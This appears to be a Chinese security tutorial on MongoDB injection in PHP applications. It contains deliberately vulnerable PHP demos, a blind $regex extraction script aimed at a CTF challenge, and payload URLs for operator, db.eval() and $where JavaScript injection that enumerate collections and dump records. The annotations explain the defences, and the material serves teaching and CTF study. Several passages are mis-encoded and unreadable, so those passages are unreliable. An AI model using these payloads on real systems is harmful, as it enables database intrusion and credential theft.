0x00
前言
关于 mongodb 的基本安装、运行操作以及 php 操作 mongodb，请参考我以前的文章。
php 下操作 mongodb 的帖子国内已经有了，但是基于 php 对 mongodb 进行注入攻击的文章似乎还比较少。本文是笔者在学习、查阅了大量资料后的一些总结，文中涉及的攻击手法及其知识产权全部归原作者所有，我只是大自然的搬运工。未征得笔者同意，请勿转载。
0x01 概括
php 下操作 mongodb 大致有以下两种方式：
1. 用 mongo 类中相应的方法执行增、查、删、改，比如：
<?php
// Legacy "mongo" extension API (MongoClient, PHP 5.x; superseded by the
// "mongodb" extension in PHP 7). Every CRUD method takes a PHP array that the
// driver serializes to BSON, so what reaches the server is the array's
// *structure*, never a string. That is why the "array binding" injection later
// in this write-up works by smuggling operator keys such as $ne rather than by
// breaking out of quotes. Arguments are omitted here, as in the write-up.
$client     = new MongoClient();
$database   = $client->myinfo;   // select database
$collection = $database->test;   // select collection
$collection->save();             // create
$collection->find();             // read
$collection->remove();           // delete
$collection->update();           // update
此时，传递进入的参数是一个数组。
2. 用 execute 方法执行字符串，比如：
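<?php
// Legacy "mongo" extension: MongoDB::execute() ships the string to the server
// as db.eval(), i.e. it runs arbitrary JavaScript inside the mongod process.
// db.eval() was deprecated in MongoDB 3.0 and removed in 4.2, and MongoClient
// does not exist in the PHP 7 "mongodb" extension, so this code path (and the
// string-concatenation injection it enables) is only reachable on legacy
// stacks. Each assignment below overwrites the previous one; only the last
// string is actually executed.
//
// Fixes vs. the original listing: the "update" comment was missing its `//`
// (a bare word in PHP code, i.e. a parse error), and the update payload was
// `{'newsid',2}`, which is not a valid JS object literal (comma instead of
// colon) and would make eval() fail with a syntax error.
$client   = new MongoClient();
$database = $client->myinfo; // select database

$query = "db.table.save({'newsid':1})";   // create
$query = "db.table.find({'newsid':1})";   // read
$query = "db.table.remove({'newsid':1})"; // delete
// Whole-document replacement (no $set), kept as in the write-up.
$query = "db.table.update({'newsid':1},{'newsid':2})"; // update

$result = $database->execute($query);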
此时，传进 execute 方法的参数就是字符串变量 $query。
特别的，此时字符串的书写语法为 js 的书写语法。注意：`$db->execute()` 在服务端对应 `db.eval()`，会在 mongod 进程内执行任意 JavaScript；该接口自 MongoDB 3.0 起弃用、4.2 起移除，而 PHP 7 以后取代旧 `mongo` 扩展（`MongoClient`）的 `mongodb` 扩展也没有 `execute()` 方法，所以第 2 种方式及其对应的注入只存在于老旧环境。
对于以上两种不同的执行方式，有不同的注入攻击方式。
0x02 注入攻击
0. 在攻击前，我们需要先建立一个集合，作为攻击的基础。

Óû§testÊǹ¥»÷ÕßÒѾ֪µÀÕ˺ÅÃÜÂëµÄÒ»¸ö²âÊÔÕ˺ţ¬ÆäËûÕ˺ŵϰÃÜÂëËæ»ú¡£Ïëͨ¹ý×¢Èë»ñÈ¡ÆäËûÕ˺ŵÄÃÜÂë¡£
1. 数组绑定时的注入
一个数组绑定的查询 demo 如下：
<?php
// Array-binding login lookup (deliberately vulnerable demo for this write-up).
// Request parameters are placed straight into the query document. PHP turns
// `username[$ne]=x` into array('$ne' => 'x'), which the driver serializes as
// the operator {$ne: 'x'}, so a client controls the query *structure*, not
// just the values.
// Defense (not applied here because the payloads in the text depend on it):
// accept only scalars, e.g.
//   if (!is_string($username) || !is_string($password)) { exit; }
// before building $filter, and never echo stored passwords back.
$client     = new MongoClient();
$collection = $client->myinfo->test; // database myinfo, collection test

$username = $_GET['username']; // may be a string OR an array (see above)
$password = $_GET['password'];

$filter = array(
    'username' => $username,
    'password' => $password,
);
$cursor = $collection->find($filter);

if ($cursor->count() > 0) {
    // Raw document fields are echoed into HTML without escaping (reflected
    // XSS as well); kept verbatim because this is the exfil channel the
    // write-up relies on.
    foreach ($cursor as $doc) {
        echo 'username:' . $doc['username'] . "</br>";
        echo 'password:' . $doc['password'] . "</br>";
    }
} else {
    echo 'δÕÒµ½'; // "not found" (literal is mis-encoded in the source)
}
?>

此时的攻击利用了 php 可以传递数组参数的一个特性。
当传入的 url 为：
http://127.0.0.1/2.php?username=test&password=test
执行了语句：
db.test.find({username:'test',password:'test'}); |
如果此时传入的 url 如下：
http://127.0.0.1/2.php?username[xx]=test&password=test |
则 $username 就是一个数组，也就相当于执行了 php 语句：
$data = array( 'username'=>array('xx'=>'test'), 'password'=>'test'); |
而 mongodb 对多维数组的解析使最终执行了如下语句：
db.test.find({username:{'xx':'test'},password:'test'}); |
利用此特性，我们可以传入数据，使数组的键名为一个操作符（大于、小于、等于、不等于等等），完成一些攻击者预期的查询。防御方法：取参数后先用 `is_string()` 检查（或显式 `(string)` 强转），数组一律拒绝，这样 `$ne`、`$regex` 之类的键就无法进入查询文档。
如，传入 url：
http://127.0.0.1/2.php?username[$ne]=test&password[$ne]=test |
结果如图

因为传入的键名 $ne 正是一个 mongodb 操作符，最终执行了语句：
db.test.find({username:{'$ne':'test'},password:{'$ne':'test'}}); |
这句话相当于 sql：
select * from test where username!='test' and password!='test'; |
直接遍历出集合中除 test 之外的所有数据（两个 `$ne` 条件只会排除 username 或 password 恰好等于 test 的记录）。
如果此时的用户名与密码不能回显，只是返回一个逻辑上的正误判断，
那么我们可以采用 $regex 操作符来一位一位地获取数据。
案例演示：http://121.40.86.166:23339/
这是 hctf 中的一道题目。
猜测其 php 代码大概如下：
<?php
// Reconstructed (guessed) server code for the HCTF challenge; the author says
// it is an approximation. Code left byte-identical on purpose: the exploit
// script that follows fingerprints the response by its exact byte length, so
// any change to the output strings would break that oracle.
$mongo = new mongoclient();
$db = $mongo->myinfo; // select database
$coll = $db->test; // select collection
$lock = $_POST['lock'];
$key = $_POST['key'];
if (is_array($lock)) {
    // Array input is accepted as-is, so lock[$regex]=^... becomes
    // {lock: {$regex: '^...'}} and the two distinct messages below act as a
    // boolean oracle on the stored value (blind, character-by-character
    // extraction). Rejecting non-string input here would close the hole.
    $data = array( 'lock'=>$lock);
    $data = $coll->find($data);
    if ($data->count()>0) {
        echo 'the lock is right,but wrong key';
    }else{
        echo 'lock is wrong';
    }
}else{
    // Scalar path: plain comparison against the hard-coded secret.
    if ($lock == 'aabbccdd'&&$key=='aabbccdd') {
        echo 'Your flag is xxxxxxx';
    }else{
        echo 'lock is wrong';
    }
}
?>
这样的话，因为只有“正确”或者“错误”两种回显，我们只能通过正则判断来一位一位地读取 lock 的内容了。
对于该题的利用 payload 如下：
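<?php
// Blind extraction of the "lock" value via $regex, one character per round.
// Each probe posts lock[$regex]=^<known prefix><candidate>; the server answers
// with one of two fixed messages, and a 319-byte response identifies the
// "prefix matches" one for this particular target. The oracle length is
// specific to that page and must be re-measured for any other target.
//
// Changes vs. the original: the curl handle is released; the outer loop stops
// as soon as a round finds no matching character (the original kept issuing
// identical requests for the remaining rounds); a failed request (false) is
// reported instead of being silently treated as a 0-byte body; and the URL,
// oracle length, character set and maximum length are named constants.
$target    = 'http://121.40.86.166:23339/';
$hitLength = 319; // byte length of the "the lock is right,but wrong key" page
$charset   = '0123456789abcdefghijklmnopqrstuvwxyz'; // extend if the secret may contain other characters
$maxLength = 10;  // upper bound on the number of characters to recover

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);

$recovered = '';
for ($pos = 0; $pos < $maxLength; $pos++) {
    $found = false;
    for ($j = 0; $j < strlen($charset); $j++) {
        // Anchored regex: matches only when the stored lock starts with
        // recovered + candidate. Every charset member is regex-safe (alnum),
        // so no escaping is needed; `$regex` is literal in single quotes.
        $post = 'key=1&lock[$regex]=^' . $recovered . $charset[$j];
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        $body = curl_exec($ch);
        if ($body === false) {
            fwrite(STDERR, 'request failed: ' . curl_error($ch) . "\r\n");
            continue;
        }
        if (strlen($body) == $hitLength) {
            $recovered .= $charset[$j];
            echo $recovered . "\r\n";
            $found = true;
            break;
        }
    }
    if (!$found) {
        // No candidate extended the prefix: either the whole value has been
        // recovered or it contains a character outside $charset.
        break;
    }
}
curl_close($ch);
?>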
结果如图：

相当于在数据库中多次执行查询：
db.test.find({lock:{'$regex':'^a'}});
db.test.find({lock:{'$regex':'^b'}});
db.test.find({lock:{'$regex':'^c'}});
db.test.find({lock:{'$regex':'^ca'}});
...
db.test.find({lock:{'$regex':'^aabbccdd'}});
最终全部猜出字符串的内容，类似于 sql 注入中的盲注。
2. 拼接字符串时的注入
因为字符串的拼接方式多种多样，不同程序员也有不同的书写习惯，
本文中仅举几个 demo 为例。
<?php
// String-concatenation variant (deliberately vulnerable demo). The request
// parameters are interpolated into a JavaScript snippet that MongoDB::execute()
// hands to the server's db.eval(); a single quote in either parameter closes
// the literal and the rest of the input runs as JS on the database server.
// Echoing errmsg verbatim is what makes the injection point visible
// (error-based), and the username/password echo is the exfil channel.
// Defense: never build server-side JS from user input -- use the array API
// with scalar-checked values. execute()/db.eval() no longer exist on
// MongoDB 4.2+ or in the PHP 7 "mongodb" extension.
$username = $_GET['username'];
$password = $_GET['password'];

// Injection sink: both values are spliced verbatim into server-side JS.
$query = "var data = db.test.findOne({username:'$username',password:'$password'});return data;";

$client = new MongoClient();
$result = $client->myinfo->execute($query);

if ($result['ok'] != 1) {
    echo $result['errmsg']; // server-side JS error leaked to the client
} elseif ($result['retval'] != NULL) {
    echo 'username:' . $result['retval']['username'] . "</br>";
    echo 'password:' . $result['retval']['password'] . "</br>";
} else {
    echo 'δÕÒµ½'; // "not found" (literal is mis-encoded in the source)
}
?>
攻击方式：
http://127.0.0.1/1.php?username=test'&password=test |

报错。想办法闭合语句：
http://127.0.0.1/1.php?username=test'});return {username:1,password:2}//&password=test |
该语句能返回一个数组，username 键值是 1，password 键值是 2。

爆 mongodb 版本（payload 同上，把返回对象中的 `username:1` 换成 `username:db.version()` 即可）
http://127.0.0.1/1.php?username=test'});return {username:tojson(db.getCollectionNames()),password:2};//&password=test |
爆所有集合名
PS：因为 db.getCollectionNames() 返回的是数组，需要用 tojson 转换为字符串。并且 mongodb 的函数区分大小写。

爆 test 集合的第一条数据
http://127.0.0.1/1.php?username=test'});return {username:tojson(db.test.find()[0]),password:2};//&password=test |

爆 test 集合的第二条数据（payload 同上，把 `find()[0]` 换成 `find()[1]`）

因为 execute 方法支持多语句执行，所以能执行的语句太多了，不再一一演示~
当然，有时可能遇到没有输出、不返回数据的情况，这时候怎么办呢？
在高版本下，添加了一个函数 sleep()，就是时间盲注咯~（shell 里的 sleep() 以毫秒为单位）
PS:Ôڸ߰汾Ï£¬Ã²ËƲ»ÄÜÓÃ×¢ÊÍÓï¾ä£¬´ËÍâ¸ß°æ±¾»¹ÓÐÒ»¸öÐÂÌØÐÔ¾ÍÊÇĬÈÏ¿ªÆô´íÎó»ØÏÔ¡£±ÊÕß³¢ÊÔûÓÐ×¢Êͳɹ¦£¬Ö»ÄÜÓñպϵķ½·¨¡£
http://127.0.0.1/1.php?username=test'});if (db.version() > "0") { sleep(10000); exit; }var b=({a:'1&password=test |
成功延时了十秒（payload 中的 10000 即 10 秒）。

另一个 demo
ÔÚMongdbÖпÉÒÔʹÓÃ$where²Ù×÷·û¡£Ï൱ÓÚsqlÓï¾äÖеÄwhereÏÞÖÆÓï¾ä¡£mongodbÖеÄ$where²Ù×÷·û³£³£ÒýÈëÒ»¸öjsµÄº¯ÊýÀ´×÷ΪÏÞÖÆÌõ¼þ£¬µ±jsº¯ÊýÖеÄ×Ö·û´®´æÔÚδ¹ýÂ˵ÄÓû§ÊäÈëʱ£¬×¢Èë¾Í²úÉúÁË¡£
放 demo：
<?php
// $where variant (deliberately vulnerable demo). The user-supplied value is
// interpolated into the body of a JavaScript function that MongoDB evaluates
// server-side for each candidate document; a quote in ?news= breaks out of the
// literal and the remainder becomes JS (the `'&&...&&'1'=='1` payloads below).
// Unlike db.eval(), $where still works on current MongoDB releases whenever
// server-side scripting is enabled, so this pattern remains exploitable.
// Defense: express the condition with ordinary query operators
// (array('news' => $news)) instead of $where; if $where is unavoidable, never
// splice request data into it. The `echo $function` is debug output that also
// reflects the raw parameter into the page.
$client     = new MongoClient();
$collection = $client->myinfo->news; // database myinfo, collection news
$news       = $_GET['news'];

// Injection sink: request value spliced into server-side JS.
$function = "function() {if(this.news == '$news') return true}";
echo $function;

$matches = $collection->find(array('$where' => $function));
$exists  = $matches->count() > 0;
// Literals mean "the news exists" / "the news does not exist"
// (mis-encoded in the source, reproduced as-is).
echo $exists ? '¸ÃÐÂÎÅ´æÔÚ' : '¸ÃÐÂÎŲ»´æÔÚ';
?>
为了测试，我建立了两个集合：一个是 news 集合，查询过程中存在注入；另一个是 user 集合，我们要通过注入得到其中的数据。
代码中的 this.news 指的就是表中的 news 栏（字段），上面的代码翻译成 sql 语句就是：
select * from news where news='$news' |
该 demo 的注入方式可以参考如下：
http://127.0.0.1/3.php?news=test |
返回正常
http://127.0.0.1/3.php?news=test' |
返回错误
http://127.0.0.1/3.php?news=test'%26%26'1'=='1 |
返回正常
http://127.0.0.1/3.php?news=test'%26%26'1'=='2 |
返回错误
至此检测出注入，开始获取数据。
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames().length>0%26%26'1'=='1 |
返回正常，集合数大于 0
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames().length==5%26%26'1'=='1 |
返回正常，集合数等于 5

获取集合名称
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames()[0].length==6%26%26'1'=='1 |
返回正常，第一个集合名称长度为 6
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames()[0][0]>'a'%26%26'1'=='1 |
返回正常，第一个集合名称的第一个字符大于 a
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames()[0][0]=='m'%26%26'1'=='1 |
返回正常，第一个集合名称的第一个字符为 m

最终可以破解出存在 user 集合。
查 user 集合中的第一条数据：
http://127.0.0.1/3.php?news=test'%26%26tojson(db.user.find()[0])[0]=='{'%26%26'1'=='1 |
因为 db.user.find() 返回的不是一个字符串，无法取出字符进行比较，我们可以用 tojson 将它转化成一个 json 字符串，就可以逐字符比较了。
道理讲明白了，剩下的都是体力活，用 python 或者 php 写个小脚本就能实现自动化。
|